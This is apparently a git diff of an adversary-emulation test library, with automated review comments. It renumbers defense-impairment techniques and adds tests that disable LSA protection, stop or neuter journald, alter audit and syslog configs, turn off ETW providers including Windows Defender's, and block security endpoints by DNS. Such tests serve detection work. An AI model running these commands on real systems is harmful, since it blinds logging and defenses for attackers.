@@ -1,6 +1,53 @@ -attack_technique: T1562.001 -display_name: 'Impair Defenses: Disable or Modify Tools' +attack_technique: T1685 +display_name: 'Disable or Modify Tools' atomic_tests: +- name: Windows Disable LSA Protection + auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d + description: | + The following Atomic adds a registry entry to disable LSA Protection. + + The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data. + Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection. + https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection + https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/ + https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/ + supported_platforms: + - windows + executor: + command: | + reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f + cleanup_command: | + reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Disable journal logging via systemctl utility + auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f + description: | + The atomic test disables the journal logging using built-in systemctl utility + supported_platforms: + - linux + executor: + command: | + sudo systemctl stop systemd-journald #disables journal logging + cleanup_command: | + sudo systemctl start systemd-journald #starts journal service + sudo systemctl enable 
systemd-journald #starts journal service automatically at boot time + name: sh + elevation_required: true +- name: Disable journal logging via sed utility + auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f + description: | + The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk + supported_platforms: + - linux + executor: + command: | + sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf + cleanup_command: | + sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data + sudo systemctl restart systemd-journald #restart the journal service + name: sh + elevation_required: true - name: Disable syslog auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 description: | @@ -246,7 +293,7 @@ atomic_tests: sysmon_exe: description: The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) type: path - default: PathToAtomicsFolder\T1562.001\bin\sysmon.exe + default: PathToAtomicsFolder\T1685\bin\sysmon.exe dependency_executor_name: powershell dependencies: - description: | 
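Review bot: in the `@@ -1,6 +1,53 @@` hunk, the cleanup for "Windows Disable LSA Protection" deletes `RunAsPPL` outright rather than restoring the prior value, so on a host that had `RunAsPPL` set to 1 before the test the cleanup leaves LSA protection disabled; capture the existing value in the attack step (`reg query HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL`) and write it back, deleting only when it was absent. In "Disable journal logging via sed utility", `s/Storage=auto/Storage=none/` only matches an uncommented line while the stock journald.conf ships the key as `#Storage=auto`, so the substitution either does nothing or edits a comment, and the attack command never restarts systemd-journald, so even a successful edit takes no effect until the cleanup's restart; anchor the pattern as `s/^#\?Storage=auto/Storage=none/` and add `sudo systemctl restart systemd-journald` after the edit (the same applies to the cleanup). In the systemctl test, the cleanup's `sudo systemctl enable systemd-journald` reverts nothing the attack step changed (only `stop` was issued) and can be dropped.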
@@ -1370,3 +1417,272 @@ atomic_tests: sysctl -w kernel.randomize_va_space=2 name: bash elevation_required: true +- name: 'Auditing Configuration Changes on Linux Host' + auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 + description: | + Emulates modification of auditd configuration files + supported_platforms: + - linux + input_arguments: + audisp_config_file_name: + description: The name of the audispd configuration file to be changed + type: string + default: audispd.conf + auditd_config_file_name: + description: The name of the auditd configuration file to be changed + type: string + default: auditd.conf + libaudit_config_file_name: + description: The name of the libaudit configuration file to be changed + type: string + default: libaudit.conf + executor: + command: | + sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name} + if [ -f "/etc/#{auditd_config_file_name}" ]; + then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name} + else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name} + fi + sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name} + cleanup_command: | + sed -i '$ d' /etc/audisp/#{audisp_config_file_name} + if [ -f "/etc/#{auditd_config_file_name}" ]; + then sed -i '$ d' /etc/#{auditd_config_file_name} + else sed -i '$ d' /etc/audit/#{auditd_config_file_name} + fi + sed -i '$ d' /etc/#{libaudit_config_file_name} + name: bash + elevation_required: true +- name: 'Auditing Configuration Changes on FreeBSD Host' + auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd + description: | + Emulates modification of auditd configuration files + supported_platforms: + - linux + input_arguments: + auditd_config_file_name: + description: The name of the auditd configuration file to be changed + type: string + default: audit_event + executor: + command: | + echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name} + cleanup_command: | + sed -i "" 
'/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name} + name: sh + elevation_required: true +- name: 'Logging Configuration Changes on Linux Host' + auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c + description: | + Emulates modification of syslog configuration. + supported_platforms: + - linux + input_arguments: + syslog_config_file_name: + description: The name of the syslog configuration file to be changed + type: string + default: syslog.conf + rsyslog_config_file_name: + description: The name of the rsyslog configuration file to be changed + type: string + default: rsyslog.conf + syslog_ng_config_file_name: + description: The name of the syslog-ng configuration file to be changed + type: string + default: syslog-ng.conf + executor: + command: | + if [ -f "/etc/#{syslog_config_file_name}" ]; + then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name} + fi + if [ -f "/etc/#{rsyslog_config_file_name}" ]; + then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name} + fi + if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ]; + then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name} + fi + cleanup_command: | + if [ -f "/etc/#{syslog_config_file_name}" ]; + then sed -i '$ d' /etc/#{syslog_config_file_name} + fi + if [ -f "/etc/#{rsyslog_config_file_name}" ]; + then sed -i '$ d' /etc/#{rsyslog_config_file_name} + fi + if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ]; + then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name} + fi + name: bash + elevation_required: true +- name: 'Logging Configuration Changes on FreeBSD Host' + auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8 + description: | + Emulates modification of syslog configuration. 
+ supported_platforms: + - linux + input_arguments: + syslog_config_file_name: + description: The name of the syslog configuration file to be changed + type: string + default: syslog.conf + executor: + command: | + if [ -f "/etc/#{syslog_config_file_name}" ]; + then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name} + fi + cleanup_command: | + if [ -f "/etc/#{syslog_config_file_name}" ]; + then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name} + fi + name: sh + elevation_required: true + +- name: Disable Powershell ETW Provider - Windows + auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84 + description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions. + supported_platforms: + - windows + input_arguments: + ps_exec_location: + description: Location of PSExec. + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe + session: + description: The session to disable. + type: string + default: EventLog-Application + provider: + description: The provider to disable. + type: string + default: Microsoft-Windows-Powershell + dependency_executor_name: powershell + dependencies: + - description: PSExec must be installed on the machine. 
+ prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1} + get_prereq_command: |- + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" + expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force + executor: + command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets + cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets + name: powershell + elevation_required: true +- name: Disable .NET Event Tracing for Windows Via Registry (cmd) + auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b + description: Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry + supported_platforms: + - windows + executor: + command: REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0 + cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1 + name: command_prompt + elevation_required: true +- name: Disable .NET Event Tracing for Windows Via Registry (powershell) + auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758 + description: Disables ETW for the .NET Framework using PowerShell to update the Windows registry + supported_platforms: + - windows + executor: + command: New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force + cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1 + name: powershell + elevation_required: true +- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd + auto_generated_guid: 
f6df0b8e-2c83-44c7-ba5e-0fa4386bec41 + description: | + An adversary can disable the ETW Provider of Windows Defender, + so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. + https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a + supported_platforms: + - windows + executor: + command: | + reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f + cleanup_command: | + reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell + auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02 + description: | + An adversary can disable the ETW Provider of Windows Defender, + so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. + https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a + supported_platforms: + - windows + executor: + command: | + New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force + cleanup_command: | + Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore + name: powershell + elevation_required: true +- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd + auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b + description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required. 
+ supported_platforms: + - windows + executor: + command: REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f + cleanup_command: REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1 + name: command_prompt +- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell + auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee + description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required. + supported_platforms: + - windows + executor: + command: New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force + cleanup_command: Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled + name: powershell +- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd + auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf + description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required. + supported_platforms: + - windows + executor: + command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f + cleanup_command: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1 + name: command_prompt + elevation_required: true +- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell + auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911 + description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required. 
+ supported_platforms: + - windows + executor: + command: New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force + cleanup_command: Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled + name: powershell + elevation_required: true +- name: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table + auto_generated_guid: 1174b5df-2c33-490f-8854-f5eb80c907ca + description: Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com. + supported_platforms: + - windows + executor: + command: |- + Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table" + Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table" + Clear-DnsClientCache + cleanup_command: |- + try { + # Get all current NRPT rules + $DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' } + + # Remove each NRPT rule + foreach ($rule in $DnsClientNrptRules) { + Remove-DnsClientNrptRule -Name $rule.Name -Force + } + + # Clear DNS client cache + Clear-DnsClientCache + Write-Host "All NRPT rules have been removed and the DNS cache has been cleared." + } + + catch { + Write-Host "An error occurred: $_" + } + Clear-DnsClientCache + name: powershell + elevation_required: true 
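Review bot: in the `@@ -1370,3 +1417,272 @@` hunk, the attack command of "Disable .NET Event Tracing for Windows Via Registry (cmd)", `REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0`, has no `/f`, so when the value already exists reg.exe prompts to overwrite and the non-interactive executor hangs; add `/f` as the cleanup already does and as the PowerShell variant does with `-Force`. The two "FreeBSD Host" tests declare `supported_platforms: - linux` while their names and the BSD-only `sed -i "" '/.../d'` form target FreeBSD (GNU sed takes the empty string as the script and fails), so the platform tag should match the target; conversely, the Linux "Auditing Configuration Changes" test edits `/etc/audisp/#{audisp_config_file_name}` unconditionally although its other paths are guarded with `[ -f ... ]`, and the same guard is needed there. The marker strings `#art_test_1562_006_1` and `#art_test_1562_006_2` still carry the old technique ID now that the tests live under T1685. In "Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table" the description claims the test will "respond with 127.0.0.1", but `-NameServers 127.0.0.1` directs the query to a resolver on loopback rather than answering with that address, so resolution simply fails unless something listens on 127.0.0.1:53; the description should say that, and the cleanup calls `Clear-DnsClientCache` twice (inside the try block and again after the catch). The "HKCU Registry - PowerShell" cleanup `Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled` lacks `-ErrorAction Ignore`, so it errors when the attack step never ran, unlike the LockBit Black PowerShell cleanup in the same hunk.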
diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1686/T1686.md similarity index 98% rename from atomics/T1562.004/T1562.004.md rename to atomics/T1686/T1686.md index 8272b38b..6033e655 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1686/T1686.md @@ -1,4 +1,4 @@ -# T1562.004 - Impair Defenses: Disable or Modify System Firewall +# T1686 - Disable or Modify System Firewall ## Description from ATT&CK @@ -10,7 +10,7 @@ > > In ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall) -[Source](https://attack.mitre.org/techniques/T1562/004) +[Source](https://attack.mitre.org/techniques/T1686) ## Atomic Tests @@ -159,7 +159,7 @@ This test will attempt to allow an executable through the system firewall locate | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| exe_file_path | path to exe file | path | PathToAtomicsFolder\T1562.004\bin\AtomicTest.exe| +| exe_file_path | path to exe file | path | PathToAtomicsFolder\T1686\bin\AtomicTest.exe| #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) 
@@ -758,13 +758,13 @@ Adversaries may disable the ESXI firewall via ESXCLI #### Attack Commands: Run with `command_prompt`! ```cmd -#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt +#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_disable_firewall.txt ``` #### Cleanup Commands ```cmd -#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt +#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_enable_firewall.txt ``` #### Dependencies: Run with `powershell`! diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1686/T1686.yaml similarity index 98% rename from atomics/T1562.004/T1562.004.yaml rename to atomics/T1686/T1686.yaml index 1c59db81..6fd2df5e 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1686/T1686.yaml @@ -1,5 +1,5 @@ -attack_technique: T1562.004 -display_name: 'Impair Defenses: Disable or Modify System Firewall' +attack_technique: T1686 +display_name: 'Disable or Modify System Firewall' atomic_tests: - name: Disable Microsoft Defender Firewall auto_generated_guid: 88d05800-a5e4-407e-9b53-ece4174f197f @@ -79,7 +79,7 @@ atomic_tests: exe_file_path: description: path to exe file type: path - default: PathToAtomicsFolder\T1562.004\bin\AtomicTest.exe + default: PathToAtomicsFolder\T1686\bin\AtomicTest.exe executor: command: | Copy-Item "#{exe_file_path}" -Destination "C:\Users\$env:UserName" -Force 
@@ -473,9 +473,9 @@ atomic_tests: Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" executor: command: | - #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_disable_firewall.txt cleanup_command: | - #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1686\src\esxi_enable_firewall.txt name: command_prompt elevation_required: false - name: Set a firewall rule using New-NetFirewallRule diff --git a/atomics/T1562.004/bin/AtomicTest.exe b/atomics/T1686/bin/AtomicTest.exe similarity index 100% rename from atomics/T1562.004/bin/AtomicTest.exe rename to atomics/T1686/bin/AtomicTest.exe diff --git a/atomics/T1562.004/src/esxi_disable_firewall.txt b/atomics/T1686/src/esxi_disable_firewall.txt similarity index 100% rename from atomics/T1562.004/src/esxi_disable_firewall.txt rename to atomics/T1686/src/esxi_disable_firewall.txt diff --git a/atomics/T1562.004/src/esxi_enable_firewall.txt b/atomics/T1686/src/esxi_enable_firewall.txt similarity index 100% rename from atomics/T1562.004/src/esxi_enable_firewall.txt rename to atomics/T1686/src/esxi_enable_firewall.txt diff --git a/atomics/T1562.009/T1562.009.md b/atomics/T1688/T1688.md similarity index 94% rename from atomics/T1562.009/T1562.009.md rename to atomics/T1688/T1688.md index d4539d56..96006adb 100644 --- a/atomics/T1562.009/T1562.009.md +++ b/atomics/T1688/T1688.md @@ -1,4 +1,4 @@ -# T1562.009 - Impair Defenses: Safe Boot Mode +# T1688 - Safe Mode Boot ## Description from ATT&CK 
@@ -8,7 +8,7 @@ > > Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021) -[Source](https://attack.mitre.org/techniques/T1562/009) +[Source](https://attack.mitre.org/techniques/T1688) ## Atomic Tests diff --git a/atomics/T1562.009/T1562.009.yaml b/atomics/T1688/T1688.yaml similarity index 84% rename from atomics/T1562.009/T1562.009.yaml rename to atomics/T1688/T1688.yaml index f8111d44..16d62ec0 100644 --- a/atomics/T1562.009/T1562.009.yaml +++ b/atomics/T1688/T1688.yaml @@ -1,5 +1,5 @@ -attack_technique: T1562.009 -display_name: 'Impair Defenses: Safe Boot Mode' +attack_technique: T1688 +display_name: 'Safe Mode Boot' atomic_tests: - name: Safe Mode Boot auto_generated_guid: 2a78362e-b79a-4482-8e24-be397bce4d85 diff --git a/atomics/T1562.010/T1562.010.md b/atomics/T1689/T1689.md similarity index 97% rename from atomics/T1562.010/T1562.010.md rename to atomics/T1689/T1689.md index f36e70c7..f2d9075c 100644 --- a/atomics/T1562.010/T1562.010.md +++ b/atomics/T1689/T1689.md @@ -1,4 +1,4 @@ -# T1562.010 - Impair Defenses: Downgrade Attack +# T1689 - Downgrade Attack ## Description from ATT&CK 
@@ -8,7 +8,7 @@ > > Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade) On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.(Citation: SafeBreach) -[Source](https://attack.mitre.org/techniques/T1562/010) +[Source](https://attack.mitre.org/techniques/T1689) ## Atomic Tests @@ -77,7 +77,7 @@ An adversary will change the VIB acceptance level to CommunitySupported to downg | vm_user | Specify the privilege user account on ESXi Server | string | root| | vm_pass | Specify the privilege user password on ESXi Server | string | pass| | plink_file | Path to plink | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe| -| cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder\T1562.010\src\esx_community_supported.txt| +| cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder\T1689\src\esx_community_supported.txt| #### Attack Commands: Run with `command_prompt`! diff --git a/atomics/T1562.010/T1562.010.yaml b/atomics/T1689/T1689.yaml similarity index 96% rename from atomics/T1562.010/T1562.010.yaml rename to atomics/T1689/T1689.yaml index 4fd651fa..6fb999e2 100644 --- a/atomics/T1562.010/T1562.010.yaml +++ b/atomics/T1689/T1689.yaml @@ -1,5 +1,5 @@ -attack_technique: T1562.010 -display_name: 'Impair Defenses: Downgrade Attack' +attack_technique: T1689 +display_name: 'Downgrade Attack' atomic_tests: - name: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI auto_generated_guid: 062f92c9-28b1-4391-a5f8-9d8ca6852091 
@@ -65,7 +65,7 @@ atomic_tests: cli_script: description: Path to script with commands to change acceptance level type: path - default: PathToAtomicsFolder\T1562.010\src\esx_community_supported.txt + default: PathToAtomicsFolder\T1698\src\esx_community_supported.txt dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1562.010/src/esx_community_supported.txt b/atomics/T1689/src/esx_community_supported.txt similarity index 100% rename from atomics/T1562.010/src/esx_community_supported.txt rename to atomics/T1689/src/esx_community_supported.txt diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1690/T1690.md similarity index 99% rename from atomics/T1562.003/T1562.003.md rename to atomics/T1690/T1690.md index 16d9fd74..777e00a0 100644 --- a/atomics/T1562.003/T1562.003.md +++ b/atomics/T1690/T1690.md @@ -1,4 +1,4 @@ -# T1562.003 - Impair Defenses: Impair Command History Logging +# T1690 - Prevent Command History Logging ## Description from ATT&CK @@ -12,7 +12,7 @@ > > Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging). -[Source](https://attack.mitre.org/techniques/T1562/003) +[Source](https://attack.mitre.org/techniques/T1690) ## Atomic Tests diff --git a/atomics/T1562.003/T1562.003.yaml b/atomics/T1690/T1690.yaml similarity index 99% rename from atomics/T1562.003/T1562.003.yaml rename to atomics/T1690/T1690.yaml index d79d24aa..e8ef1fe6 100644 --- a/atomics/T1562.003/T1562.003.yaml +++ b/atomics/T1690/T1690.yaml @@ -1,5 +1,5 @@ -attack_technique: T1562.003 -display_name: 'Impair Defenses: Impair Command History Logging' +attack_technique: T1690 +display_name: 'Prevent Command History Logging' atomic_tests: - name: Disable history collection auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
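Review bot: the new `cli_script` default in the T1689.yaml hunk (`@@ -65,7 +65,7 @@`) reads `PathToAtomicsFolder\T1698\src\esx_community_supported.txt`, but the directory is renamed to `atomics/T1689/src/` and the matching table row in T1689.md points at `PathToAtomicsFolder\T1689\src\esx_community_supported.txt`; the digits are transposed, so the default resolves to a path that does not exist and the test's dependency check and attack command will fail; change it to `PathToAtomicsFolder\T1689\src\esx_community_supported.txt`.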